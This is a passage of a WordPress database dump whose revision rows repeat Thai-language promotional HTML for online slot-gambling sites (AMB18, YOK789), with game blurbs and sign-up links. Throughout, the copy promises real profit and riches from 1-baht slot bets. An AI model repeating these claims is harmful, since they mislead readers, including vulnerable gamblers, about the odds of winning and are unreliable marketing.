คือสล็อตสายแฟนตาซีที่หยิบเรื่องราวไข่มังกรมาเติมความมันแบบจัดเต็ม จุดเด่นคือระบบจ่ายรางวัลที่เปิดทางให้ลุ้นรัวในช่วงฟรีสปิน สัญลักษณ์ไข่มังกรแต่ละใบมีมูลค่าแตกต่างกัน ทำให้ทุกการหมุนเต็มไปด้วยความคาดหวัง ความเท่ของเกมนี้คือเอฟเฟกต์ไฟและเสียงคำรามที่ปลุกอารมณ์นักล่าให้ตื่นตัวตลอดเวลา ใครชอบเกมที่มีจังหวะพีคชัดเจนและมีโอกาสพลิกเกมในรอบเดียวจะถูกใจแน่นอน เล่นง่ายไม่ซับซ้อนแต่ให้ฟีลเหมือนกำลังผจญภัยในดินแดนมังกร ทุกครั้งที่เข้าสู่โหมดพิเศษคือช่วงเวลาที่ลุ้นหนักและมีสิทธิ์เห็นยอดพุ่งแบบเกินคาด เป็นอีกเกมที่ตอบโจทย์สายปั่นยุคใหม่ที่อยากได้ทั้งความมันและโอกาสทำกำไรในรอบเดียว</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>ปั่น สล็อต ฟรี ทดลอง รวยได้จริง เล่นฟรี YOK789 ได้ทุกค่ายไม่จำกัด </h2> <p>สายอยากลองก่อนลุยจริงต้องถูกใจโหมด <strong>ปั่น สล็อต ฟรี ทดลอง</strong> ที่เปิดให้ทดลองเล่นได้แบบไม่จำกัดค่าย ไม่ต้องเติมก็เข้าไปสัมผัสระบบเกมได้ครบทุกฟีเจอร์ จะลองจับจังหวะแตก ดูรอบโบนัสหรือเทสสไตล์เกมไหนเหมาะกับตัวเองก็ทำได้เต็มที่ ความดีงามคือให้ประสบการณ์เหมือนเล่นเงินจริง ภาพลื่น เอฟเฟกต์ครบ ทำให้วางแผนก่อนลงสนามจริงได้แบบมือโปร ใครอยากฝึกอ่านเกมหรือหาสูตรปั่นที่เข้ามือสามารถใช้โหมดนี้ปั้นความมั่นใจได้สบาย เมื่อพร้อมค่อยสลับมาเล่นจริงก็เดินเกมได้เฉียบกว่าเดิม เป็นพื้นที่ให้ทั้งมือใหม่และสายเก๋าได้พัฒนาจังหวะตัวเองโดยไม่ต้องเสี่ยงทุนตั้งแต่รอบแรก เปิดทางสู่โอกาสรวยด้วยการเริ่มจากศูนย์แบบมีชั้นเชิง</p>','AMB18 เว็บยอดนิยม เว็บดังลิขสิทธิ์แท้ เล่นสบาย เริ่ม 1 บาท','','inherit','closed','closed','','44-revision-v1','','','2026-02-26 19:10:11','2026-02-26 19:10:11','',44,'https://amb18slot.com/?p=381',0,'revision','',0),(382,3,'2026-02-26 19:10:29','2026-02-26 19:10:29','<img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <h1>AMB18 เว็บยอดนิยม เว็บดังลิขสิทธิ์แท้ เล่นสบาย เริ่ม 1 บาท\n</h1> <p><a href=\"http://amb18slot.com\"><b>AMB18</b></a> เว็บยอดนิยมรวมความมันส์เป็นเว็บดังลิขสิทธิ์แท้ที่เล่นสบายทุกระบบรองรับสายทุนน้อย เริ่ม 1 บาท ครบทุกค่ายเกมดัง อัปเดตใหม่ตลอดเวลาที่นี่รวมทุกความบันเทิงไว้ครบในที่เดียวไม่ว่าจะเป็นสายหมุนสายทำกำไรหรือมือใหม่ที่เพิ่งเริ่มต้นก็สามารถเข้าถึงได้ง่าย ระบบถูกออกแบบมาให้ใช้งานสะดวกภาพลื่นไหลไม่มีสะดุด รองรับทั้งมือถือและคอมพิวเตอร์พร้อมมาตรฐานความปลอดภัยระดับสากล ทำให้ผู้เล่นมั่นใจได้ว่าเงินทุนและข้อมูลส่วนตัวได้รับการดูแลอย่างดี เมื่อรวมกับจุดเด่นเรื่องเริ่มต้นเพียง 1 บาท ยิ่งทำให้แพลตฟอร์มนี้กลายเป็นพื้นที่เล่นเกมที่เข้าถึงได้จริง</p> <h2>ความน่าสนใจของการสมัคร YOK789 เว็บสล็อต เล่นแตกง่าย </h2> <p>ความปังของที่นี่ไม่ได้มีแค่เกมแตกง่ายแต่เริ่มตั้งแต่ขั้นตอนสมัครที่โคตรไว กรอกข้อมูลไม่กี่ขั้นก็พร้อมลุย ไม่มีความยุ่งยากให้เสียอารมณ์ รองรับทั้งมือถือและคอม เล่นได้ทุกที่ทุกเวลา ระบบความปลอดภัยแน่นหนา ทำให้มั่นใจได้ว่าข้อมูลและธุรกรรมถูกดูแลอย่างดี ที่สำคัญคือมีทีมดูแลตลอดเวลา คอยซัพพอร์ตเมื่อมีคำถามหรือปัญหาเกิดขึ้น <a href=\"https://luca333auto.com/\"><b>เข้าสู่ระบบ</b></a> ที่นี่จุดแข็งอีกอย่างคือการอัปเดตเกมใหม่สม่ำเสมอ ทำให้ไม่รู้สึกจำเจ เล่นเมื่อไรก็มีอะไรสดใหม่ให้ลอง ใครอยากเปิดประสบการณ์สล็อตแบบมันจัดเต็มและมีโอกาสทำกำไรจริง การสมัครที่นี่คือก้าวแรกสู่เส้นทางสายปั่นที่ไม่ธรรมดา</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>บอกต่อทางเข้าการทำเงิน ทางเข้า YOK เว็บแจกโบนัส ปัน โปร สล็อต</h2> <p>ใครกำลังส่องช่องทางทำเงินแบบไม่ต้องรอจังหวะชีวิต ต้องลองเข้ามาเช็กอินกับเรา เพราะที่นี่ขึ้นชื่อเรื่องแจกโบนัสแบบจัดเต็ม โปรสล็อตมาแบบไม่กั๊ก ทั้งโบนัสต้อนรับ โปรฝากคุ้ม และกิจกรรมลุ้นรางวัลที่อัปเดตตลอด ทำให้ทุกการฝากมีมูลค่าเพิ่มมากกว่าที่คิด ความเฟี้ยวอยู่ตรงที่ระบบคำนวณอัตโนมัติ <strong>ปัน โปร สล็อต</strong> รับโปรง่ายไม่ต้องทักแชตให้เสียเวลา แค่เข้าเล่นก็มีสิทธิ์รับสิทธิพิเศษแบบต่อเนื่อง บอกเลยว่าสายล่ากำไรจะรู้สึกเหมือนได้ตัวช่วยเพิ่มพลังทุกครั้งที่หมุน เกมสล็อตหลากหลายค่ายดังรวมไว้ครบ จัดเต็มทั้งความสนุกและโอกาสทำยอดให้พุ่งแบบไม่ต้องลุ้นเหนื่อย</p><h3><b>เกมสล็อต Mahjong Ways</b></h3><p>Mahjong Ways คือสล็อตธีมไพ่นกกระจอกที่มาแรงแบบไม่มีตกกระแส จุดเด่นอยู่ที่ระบบชนะต่อเนื่องที่ทำให้ทุกการเรียงสัญลักษณ์มีสิทธิ์ไหลยาวแบบคอมโบ ภาพกราฟิกสไตล์จีนโบราณดูแพงแต่เล่นง่าย จังหวะเกมไม่เร็วเกินไปจึงเหมาะกับสายวางแผนที่ชอบดูทรงก่อนเร่งรอบ ความเฟี้ยวของเกมนี้คือฟีเจอร์ตัวคูณที่เพิ่มขึ้นเรื่อย ๆ เมื่อชนะติดกัน ทำให้กำไรพุ่งแบบไม่ทันตั้งตัว ใครชอบฟีลค่อย ๆ สะสมความได้เปรียบแล้วปิดจบด้วยรอบโบนัสหนัก ๆ จะอินกับเกมนี้สุดทาง เล่นเพลินแต่มีชั้นเชิง ทำให้ทุกการหมุนไม่ใช่แค่ลุ้นโชคแต่คือการอ่านจังหวะและเลือกสปีดให้เข้ากับสไตล์ตัวเอง</p><h3><b>เกมสล็อต Treasures of Azte</b></h3><p>Treasures of Aztec มาในธีมอารยธรรมลึกลับที่เต็มไปด้วยสีทองและพลังแห่งขุมทรัพย์ จุดขายคือรูปแบบเกมเรียบง่ายแต่ซ่อนโอกาสแตกหนักไว้ทุกตา สัญลักษณ์มูลค่าสูงมีบทบาทชัดเจน ทำให้สายลุ้นแจ็กพอตรู้สึกหัวใจเต้นแรงทุกครั้งที่วงล้อหยุด ความสนุกอยู่ที่การเข้าใจจังหวะของเกม เพราะบางรอบอาจนิ่งแต่พอเข้าโหมดโบนัสแล้วสามารถพุ่งยาวได้แบบสะใจ เหมาะกับคนที่ชอบความตื่นเต้นสไตล์รวดเร็วไม่ต้องคิดซับซ้อน ภาพสวยคมชัด เอฟเฟกต์จัดเต็ม ช่วยเพิ่มอารมณ์ร่วมทุกครั้งที่ชนะ ทำให้การปั่นแต่ละรอบมีเสน่ห์เฉพาะตัวและสร้างความรู้สึกอยากกดต่อแบบไม่ต้องฝืนใจ</p><h3><b>เกมสล็อต Dragon Hatc</b></h3><p>Dragon Hatch คือสล็อตสายแฟนตาซีที่หยิบเรื่องราวไข่มังกรมาเติมความมันแบบจัดเต็ม จุดเด่นคือระบบจ่ายรางวัลที่เปิดทางให้ลุ้นรัวในช่วงฟรีสปิน สัญลักษณ์ไข่มังกรแต่ละใบมีมูลค่าแตกต่างกัน ทำให้ทุกการหมุนเต็มไปด้วยความคาดหวัง ความเท่ของเกมนี้คือเอฟเฟกต์ไฟและเสียงคำรามที่ปลุกอารมณ์นักล่าให้ตื่นตัวตลอดเวลา ใครชอบเกมที่มีจังหวะพีคชัดเจนและมีโอกาสพลิกเกมในรอบเดียวจะถูกใจแน่นอน เล่นง่ายไม่ซับซ้อนแต่ให้ฟีลเหมือนกำลังผจญภัยในดินแดนมังกร ทุกครั้งที่เข้าสู่โหมดพิเศษคือช่วงเวลาที่ลุ้นหนักและมีสิทธิ์เห็นยอดพุ่งแบบเกินคาด เป็นอีกเกมที่ตอบโจทย์สายปั่นยุคใหม่ที่อยากได้ทั้งความมันและโอกาสทำกำไรในรอบเดียว</p> <h2>เว็บสล็อตมาแรง YOK789 เบทขั้นต่ำ 1 บาท แจกโบนัสหลักล้าน</h2> <p>กระแสความแรงของเว็บไม่ได้มาเล่น ๆ เพราะนี่คือเว็บสล็อตที่เปิดประตูให้ทุกคนเริ่มต้นด้วยเบทขั้นต่ำ 1 บาท แต่ศักยภาพการทำกำไรพุ่งได้ไกลระดับโบนัสหลักล้าน ความต่างอยู่ที่ระบบเกมคัดมาเน้นจังหวะแตกกำลังดี ทำให้สายทุนน้อยก็มีลุ้น ส่วนสายจริงจังก็เร่งรอบไล่ยอดได้เต็มที่ โปรโมชันถูกปล่อยออกมาแบบต่อเนื่อง เพิ่มแรงส่งให้ทุกยอดเดิมพันมีมูลค่ามากขึ้น บรรยากาศการเล่นเลยเต็มไปด้วยพลังและความหวัง ทุกครั้งที่หมุนเหมือนมีโอกาสเปิดทางสู่เงินก้อนใหญ่ ไม่ต้องรอจังหวะฟลุกอย่างเดียวแต่ใช้การวางแผนควบคู่ไปด้วย ใครกำลังมองหาเว็บที่เริ่มเล็กแต่โตได้จริง ที่นี่คือคำตอบที่ชัดเจนในโลกสายปั่นยุคใหม่</p> <h2>เว็บตรง YOK ยกตัวอย่างสล็อตน่าเล่นเริ่มต้นด้วยเงินทุน ปั่น สล็อต 1 บาท</h2> <p>ถ้าอยากเริ่ม <b>ปั่น สล็อต 1 บาท</b> แล้วได้ฟีลคุ้มค่า มีสล็อตหลายแนวที่ออกแบบมาให้เล่นง่ายและลุ้นสนุก เกมธีมสมบัติหรือแนวผจญภัยมักมีรอบโบนัสสุ่มแตกไว เหมาะกับสายค่อย ๆ เก็บกำไร ส่วนแนวผลไม้คลาสสิกให้จังหวะเข้าใจง่าย หมุนเพลินไม่ซับซ้อน ทำให้มือใหม่จับทางได้เร็ว ความดีคือแม้ตั้งเบทต่ำก็ยังมีโอกาสเข้าโหมดพิเศษและฟรีสปินเหมือนเบทสูง ทุกการหมุนจึงไม่เสียเปล่า อยู่ที่การบริหารทุนและเลือกเกมให้ตรงสไตล์ ใครชอบลุ้นรัวหรือชอบค่อย ๆ ไต่ยอดก็เลือกได้ตามจังหวะตัวเอง เปิดประสบการณ์ปั่นแบบเบทเบาแต่ลุ้นหนักได้ครบในที่เดียว</p><h3><b>เกมสล็อต Mahjong Ways</b></h3><p>Mahjong Ways คือสล็อตธีมไพ่นกกระจอกที่มาแรงแบบไม่มีตกกระแส จุดเด่นอยู่ที่ระบบชนะต่อเนื่องที่ทำให้ทุกการเรียงสัญลักษณ์มีสิทธิ์ไหลยาวแบบคอมโบ ภาพกราฟิกสไตล์จีนโบราณดูแพงแต่เล่นง่าย จังหวะเกมไม่เร็วเกินไปจึงเหมาะกับสายวางแผนที่ชอบดูทรงก่อนเร่งรอบ ความเฟี้ยวของเกมนี้คือฟีเจอร์ตัวคูณที่เพิ่มขึ้นเรื่อย ๆ เมื่อชนะติดกัน ทำให้กำไรพุ่งแบบไม่ทันตั้งตัว ใครชอบฟีลค่อย ๆ สะสมความได้เปรียบแล้วปิดจบด้วยรอบโบนัสหนัก ๆ จะอินกับเกมนี้สุดทาง เล่นเพลินแต่มีชั้นเชิง ทำให้ทุกการหมุนไม่ใช่แค่ลุ้นโชคแต่คือการอ่านจังหวะและเลือกสปีดให้เข้ากับสไตล์ตัวเอง</p><h3><b>เกมสล็อต Treasures of Azte</b></h3><p>Treasures of Aztec มาในธีมอารยธรรมลึกลับที่เต็มไปด้วยสีทองและพลังแห่งขุมทรัพย์ จุดขายคือรูปแบบเกมเรียบง่ายแต่ซ่อนโอกาสแตกหนักไว้ทุกตา สัญลักษณ์มูลค่าสูงมีบทบาทชัดเจน ทำให้สายลุ้นแจ็กพอตรู้สึกหัวใจเต้นแรงทุกครั้งที่วงล้อหยุด ความสนุกอยู่ที่การเข้าใจจังหวะของเกม เพราะบางรอบอาจนิ่งแต่พอเข้าโหมดโบนัสแล้วสามารถพุ่งยาวได้แบบสะใจ เหมาะกับคนที่ชอบความตื่นเต้นสไตล์รวดเร็วไม่ต้องคิดซับซ้อน ภาพสวยคมชัด เอฟเฟกต์จัดเต็ม ช่วยเพิ่มอารมณ์ร่วมทุกครั้งที่ชนะ ทำให้การปั่นแต่ละรอบมีเสน่ห์เฉพาะตัวและสร้างความรู้สึกอยากกดต่อแบบไม่ต้องฝืนใจ</p><h3><b>เกมสล็อต Dragon Hatc</b></h3><p>Dragon Hatch คือสล็อตสายแฟนตาซีที่หยิบเรื่องราวไข่มังกรมาเติมความมันแบบจัดเต็ม จุดเด่นคือระบบจ่ายรางวัลที่เปิดทางให้ลุ้นรัวในช่วงฟรีสปิน สัญลักษณ์ไข่มังกรแต่ละใบมีมูลค่าแตกต่างกัน ทำให้ทุกการหมุนเต็มไปด้วยความคาดหวัง ความเท่ของเกมนี้คือเอฟเฟกต์ไฟและเสียงคำรามที่ปลุกอารมณ์นักล่าให้ตื่นตัวตลอดเวลา ใครชอบเกมที่มีจังหวะพีคชัดเจนและมีโอกาสพลิกเกมในรอบเดียวจะถูกใจแน่นอน เล่นง่ายไม่ซับซ้อนแต่ให้ฟีลเหมือนกำลังผจญภัยในดินแดนมังกร ทุกครั้งที่เข้าสู่โหมดพิเศษคือช่วงเวลาที่ลุ้นหนักและมีสิทธิ์เห็นยอดพุ่งแบบเกินคาด เป็นอีกเกมที่ตอบโจทย์สายปั่นยุคใหม่ที่อยากได้ทั้งความมันและโอกาสทำกำไรในรอบเดียว</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>ปั่น สล็อต ฟรี ทดลอง รวยได้จริง เล่นฟรี YOK789 ได้ทุกค่ายไม่จำกัด </h2> <p>สายอยากลองก่อนลุยจริงต้องถูกใจโหมด <strong>ปั่น สล็อต ฟรี ทดลอง</strong> ที่เปิดให้ทดลองเล่นได้แบบไม่จำกัดค่าย ไม่ต้องเติมก็เข้าไปสัมผัสระบบเกมได้ครบทุกฟีเจอร์ จะลองจับจังหวะแตก ดูรอบโบนัสหรือเทสสไตล์เกมไหนเหมาะกับตัวเองก็ทำได้เต็มที่ ความดีงามคือให้ประสบการณ์เหมือนเล่นเงินจริง ภาพลื่น เอฟเฟกต์ครบ ทำให้วางแผนก่อนลงสนามจริงได้แบบมือโปร ใครอยากฝึกอ่านเกมหรือหาสูตรปั่นที่เข้ามือสามารถใช้โหมดนี้ปั้นความมั่นใจได้สบาย เมื่อพร้อมค่อยสลับมาเล่นจริงก็เดินเกมได้เฉียบกว่าเดิม เป็นพื้นที่ให้ทั้งมือใหม่และสายเก๋าได้พัฒนาจังหวะตัวเองโดยไม่ต้องเสี่ยงทุนตั้งแต่รอบแรก เปิดทางสู่โอกาสรวยด้วยการเริ่มจากศูนย์แบบมีชั้นเชิง</p>','AMB18 เว็บยอดนิยม เว็บดังลิขสิทธิ์แท้ เล่นสบาย เริ่ม 1 บาท','','inherit','closed','closed','','44-revision-v1','','','2026-02-26 19:10:29','2026-02-26 19:10:29','',44,'https://amb18slot.com/?p=382',0,'revision','',0),(383,3,'2026-02-26 19:10:30','2026-02-26 19:10:30','<img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <h1>AMB18 เว็บยอดนิยม เว็บดังลิขสิทธิ์แท้ เล่นสบาย เริ่ม 1 บาท\n</h1> <p><a href=\"http://amb18slot.com\"><b>AMB18</b></a> เว็บยอดนิยมรวมความมันส์เป็นเว็บดังลิขสิทธิ์แท้ที่เล่นสบายทุกระบบรองรับสายทุนน้อย เริ่ม 1 บาท ครบทุกค่ายเกมดัง อัปเดตใหม่ตลอดเวลาที่นี่รวมทุกความบันเทิงไว้ครบในที่เดียวไม่ว่าจะเป็นสายหมุนสายทำกำไรหรือมือใหม่ที่เพิ่งเริ่มต้นก็สามารถเข้าถึงได้ง่าย ระบบถูกออกแบบมาให้ใช้งานสะดวกภาพลื่นไหลไม่มีสะดุด รองรับทั้งมือถือและคอมพิวเตอร์พร้อมมาตรฐานความปลอดภัยระดับสากล ทำให้ผู้เล่นมั่นใจได้ว่าเงินทุนและข้อมูลส่วนตัวได้รับการดูแลอย่างดี เมื่อรวมกับจุดเด่นเรื่องเริ่มต้นเพียง 1 บาท ยิ่งทำให้แพลตฟอร์มนี้กลายเป็นพื้นที่เล่นเกมที่เข้าถึงได้จริง</p> <h2>ความน่าสนใจของการสมัคร YOK789 เว็บสล็อต เล่นแตกง่าย </h2> <p>ความปังของที่นี่ไม่ได้มีแค่เกมแตกง่ายแต่เริ่มตั้งแต่ขั้นตอนสมัครที่โคตรไว กรอกข้อมูลไม่กี่ขั้นก็พร้อมลุย ไม่มีความยุ่งยากให้เสียอารมณ์ รองรับทั้งมือถือและคอม เล่นได้ทุกที่ทุกเวลา ระบบความปลอดภัยแน่นหนา ทำให้มั่นใจได้ว่าข้อมูลและธุรกรรมถูกดูแลอย่างดี ที่สำคัญคือมีทีมดูแลตลอดเวลา คอยซัพพอร์ตเมื่อมีคำถามหรือปัญหาเกิดขึ้น <a href=\"https://luca333auto.com/\"><b>เข้าสู่ระบบ</b></a> ที่นี่จุดแข็งอีกอย่างคือการอัปเดตเกมใหม่สม่ำเสมอ ทำให้ไม่รู้สึกจำเจ เล่นเมื่อไรก็มีอะไรสดใหม่ให้ลอง ใครอยากเปิดประสบการณ์สล็อตแบบมันจัดเต็มและมีโอกาสทำกำไรจริง การสมัครที่นี่คือก้าวแรกสู่เส้นทางสายปั่นที่ไม่ธรรมดา</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>บอกต่อทางเข้าการทำเงิน ทางเข้า YOK เว็บแจกโบนัส ปัน โปร สล็อต</h2> <p>ใครกำลังส่องช่องทางทำเงินแบบไม่ต้องรอจังหวะชีวิต ต้องลองเข้ามาเช็กอินกับเรา เพราะที่นี่ขึ้นชื่อเรื่องแจกโบนัสแบบจัดเต็ม โปรสล็อตมาแบบไม่กั๊ก ทั้งโบนัสต้อนรับ โปรฝากคุ้ม และกิจกรรมลุ้นรางวัลที่อัปเดตตลอด ทำให้ทุกการฝากมีมูลค่าเพิ่มมากกว่าที่คิด ความเฟี้ยวอยู่ตรงที่ระบบคำนวณอัตโนมัติ <strong>ปัน โปร สล็อต</strong> รับโปรง่ายไม่ต้องทักแชตให้เสียเวลา แค่เข้าเล่นก็มีสิทธิ์รับสิทธิพิเศษแบบต่อเนื่อง บอกเลยว่าสายล่ากำไรจะรู้สึกเหมือนได้ตัวช่วยเพิ่มพลังทุกครั้งที่หมุน เกมสล็อตหลากหลายค่ายดังรวมไว้ครบ จัดเต็มทั้งความสนุกและโอกาสทำยอดให้พุ่งแบบไม่ต้องลุ้นเหนื่อย</p><h3><b>เกมสล็อต Mahjong Ways</b></h3><p>Mahjong Ways คือสล็อตธีมไพ่นกกระจอกที่มาแรงแบบไม่มีตกกระแส จุดเด่นอยู่ที่ระบบชนะต่อเนื่องที่ทำให้ทุกการเรียงสัญลักษณ์มีสิทธิ์ไหลยาวแบบคอมโบ ภาพกราฟิกสไตล์จีนโบราณดูแพงแต่เล่นง่าย จังหวะเกมไม่เร็วเกินไปจึงเหมาะกับสายวางแผนที่ชอบดูทรงก่อนเร่งรอบ ความเฟี้ยวของเกมนี้คือฟีเจอร์ตัวคูณที่เพิ่มขึ้นเรื่อย ๆ เมื่อชนะติดกัน ทำให้กำไรพุ่งแบบไม่ทันตั้งตัว ใครชอบฟีลค่อย ๆ สะสมความได้เปรียบแล้วปิดจบด้วยรอบโบนัสหนัก ๆ จะอินกับเกมนี้สุดทาง เล่นเพลินแต่มีชั้นเชิง ทำให้ทุกการหมุนไม่ใช่แค่ลุ้นโชคแต่คือการอ่านจังหวะและเลือกสปีดให้เข้ากับสไตล์ตัวเอง</p><h3><b>เกมสล็อต Treasures of Azte</b></h3><p>Treasures of Aztec มาในธีมอารยธรรมลึกลับที่เต็มไปด้วยสีทองและพลังแห่งขุมทรัพย์ จุดขายคือรูปแบบเกมเรียบง่ายแต่ซ่อนโอกาสแตกหนักไว้ทุกตา สัญลักษณ์มูลค่าสูงมีบทบาทชัดเจน ทำให้สายลุ้นแจ็กพอตรู้สึกหัวใจเต้นแรงทุกครั้งที่วงล้อหยุด ความสนุกอยู่ที่การเข้าใจจังหวะของเกม เพราะบางรอบอาจนิ่งแต่พอเข้าโหมดโบนัสแล้วสามารถพุ่งยาวได้แบบสะใจ เหมาะกับคนที่ชอบความตื่นเต้นสไตล์รวดเร็วไม่ต้องคิดซับซ้อน ภาพสวยคมชัด เอฟเฟกต์จัดเต็ม ช่วยเพิ่มอารมณ์ร่วมทุกครั้งที่ชนะ ทำให้การปั่นแต่ละรอบมีเสน่ห์เฉพาะตัวและสร้างความรู้สึกอยากกดต่อแบบไม่ต้องฝืนใจ</p><h3><b>เกมสล็อต Dragon Hatc</b></h3><p>Dragon Hatch คือสล็อตสายแฟนตาซีที่หยิบเรื่องราวไข่มังกรมาเติมความมันแบบจัดเต็ม จุดเด่นคือระบบจ่ายรางวัลที่เปิดทางให้ลุ้นรัวในช่วงฟรีสปิน สัญลักษณ์ไข่มังกรแต่ละใบมีมูลค่าแตกต่างกัน ทำให้ทุกการหมุนเต็มไปด้วยความคาดหวัง ความเท่ของเกมนี้คือเอฟเฟกต์ไฟและเสียงคำรามที่ปลุกอารมณ์นักล่าให้ตื่นตัวตลอดเวลา ใครชอบเกมที่มีจังหวะพีคชัดเจนและมีโอกาสพลิกเกมในรอบเดียวจะถูกใจแน่นอน เล่นง่ายไม่ซับซ้อนแต่ให้ฟีลเหมือนกำลังผจญภัยในดินแดนมังกร ทุกครั้งที่เข้าสู่โหมดพิเศษคือช่วงเวลาที่ลุ้นหนักและมีสิทธิ์เห็นยอดพุ่งแบบเกินคาด เป็นอีกเกมที่ตอบโจทย์สายปั่นยุคใหม่ที่อยากได้ทั้งความมันและโอกาสทำกำไรในรอบเดียว</p> <h2>เว็บสล็อตมาแรง YOK789 เบทขั้นต่ำ 1 บาท แจกโบนัสหลักล้าน</h2> <p>กระแสความแรงของเว็บไม่ได้มาเล่น ๆ เพราะนี่คือเว็บสล็อตที่เปิดประตูให้ทุกคนเริ่มต้นด้วยเบทขั้นต่ำ 1 บาท แต่ศักยภาพการทำกำไรพุ่งได้ไกลระดับโบนัสหลักล้าน ความต่างอยู่ที่ระบบเกมคัดมาเน้นจังหวะแตกกำลังดี ทำให้สายทุนน้อยก็มีลุ้น ส่วนสายจริงจังก็เร่งรอบไล่ยอดได้เต็มที่ โปรโมชันถูกปล่อยออกมาแบบต่อเนื่อง เพิ่มแรงส่งให้ทุกยอดเดิมพันมีมูลค่ามากขึ้น บรรยากาศการเล่นเลยเต็มไปด้วยพลังและความหวัง ทุกครั้งที่หมุนเหมือนมีโอกาสเปิดทางสู่เงินก้อนใหญ่ ไม่ต้องรอจังหวะฟลุกอย่างเดียวแต่ใช้การวางแผนควบคู่ไปด้วย ใครกำลังมองหาเว็บที่เริ่มเล็กแต่โตได้จริง ที่นี่คือคำตอบที่ชัดเจนในโลกสายปั่นยุคใหม่</p> <h2>เว็บตรง YOK ยกตัวอย่างสล็อตน่าเล่นเริ่มต้นด้วยเงินทุน ปั่น สล็อต 1 บาท</h2> <p>ถ้าอยากเริ่ม <b>ปั่น สล็อต 1 บาท</b> แล้วได้ฟีลคุ้มค่า มีสล็อตหลายแนวที่ออกแบบมาให้เล่นง่ายและลุ้นสนุก เกมธีมสมบัติหรือแนวผจญภัยมักมีรอบโบนัสสุ่มแตกไว เหมาะกับสายค่อย ๆ เก็บกำไร ส่วนแนวผลไม้คลาสสิกให้จังหวะเข้าใจง่าย หมุนเพลินไม่ซับซ้อน ทำให้มือใหม่จับทางได้เร็ว ความดีคือแม้ตั้งเบทต่ำก็ยังมีโอกาสเข้าโหมดพิเศษและฟรีสปินเหมือนเบทสูง ทุกการหมุนจึงไม่เสียเปล่า อยู่ที่การบริหารทุนและเลือกเกมให้ตรงสไตล์ ใครชอบลุ้นรัวหรือชอบค่อย ๆ ไต่ยอดก็เลือกได้ตามจังหวะตัวเอง เปิดประสบการณ์ปั่นแบบเบทเบาแต่ลุ้นหนักได้ครบในที่เดียว</p><h3><b>เกมสล็อต Mahjong Ways</b></h3><p>Mahjong Ways คือสล็อตธีมไพ่นกกระจอกที่มาแรงแบบไม่มีตกกระแส จุดเด่นอยู่ที่ระบบชนะต่อเนื่องที่ทำให้ทุกการเรียงสัญลักษณ์มีสิทธิ์ไหลยาวแบบคอมโบ ภาพกราฟิกสไตล์จีนโบราณดูแพงแต่เล่นง่าย 